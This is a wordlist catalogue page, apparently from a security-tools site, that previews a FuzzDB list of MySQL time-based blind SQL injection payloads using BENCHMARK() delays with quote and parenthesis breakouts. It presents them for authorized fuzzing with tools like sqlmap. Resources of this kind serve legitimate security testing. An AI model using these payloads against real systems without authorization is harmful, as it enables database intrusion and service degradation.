Skip to content
Fuzzing1.8 KB

FuzzDB Blind SQLi MySQL WHERE Clause

Time-based blind SQL injection payloads for MySQL WHERE clauses using BENCHMARK() delays across varied quote/parenthesis breakout contexts.

View source
Size
1.8 KB
Category
Fuzzing
Source
fuzzdb-project/fuzzdb
License
GPLv2
Recommended tools
sqlmapffufburp

Preview

First 15 entries. Download or copy the full list (1.8 KB) using the buttons above.

>head blind-sqli-mysql-where-fuzzdb.txt1.8 KB
 and 0=benchmark(3000000,MD5(1))%20/*
 and 0=benchmark(3000000,MD5(1))%20--
 and 0=benchmark(3000000,MD5(1))%20%23
' and 0=benchmark(3000000,MD5(1))%20/*
' and 0=benchmark(3000000,MD5(1))%20--
' and 0=benchmark(3000000,MD5(1))%20%23
" and 0=benchmark(3000000,MD5(1))%20/*
" and 0=benchmark(3000000,MD5(1))%20--
" and 0=benchmark(3000000,MD5(1))%20%23
) and 0=benchmark(3000000,MD5(1))%20/*
) and 0=benchmark(3000000,MD5(1))%20--
) and 0=benchmark(3000000,MD5(1))%20%23
)) and 0=benchmark(3000000,MD5(1))%20/*
)) and 0=benchmark(3000000,MD5(1))%20--
)) and 0=benchmark(3000000,MD5(1))%20%23

Time-based blind SQL injection payloads for MySQL WHERE clauses using BENCHMARK() delays across varied quote/parenthesis breakout contexts.

This list is geared toward input fuzzing and vulnerability discovery. It contains roughly 1.8 KB and pairs well with tools such as sqlmap, ffuf, burp. Pick the smallest list that fits your engagement: shorter lists are faster and quieter for online attacks, while larger lists give broader coverage for offline work where speed is less of a constraint.

You can copy the sample preview straight from this page, copy the entire list to your clipboard, or download the raw .txt file. The full list is served directly from its upstream source on GitHub.

Sourced from fuzzdb-project/fuzzdb and distributed under GPLv2. Only use wordlists against systems you are explicitly authorized to test.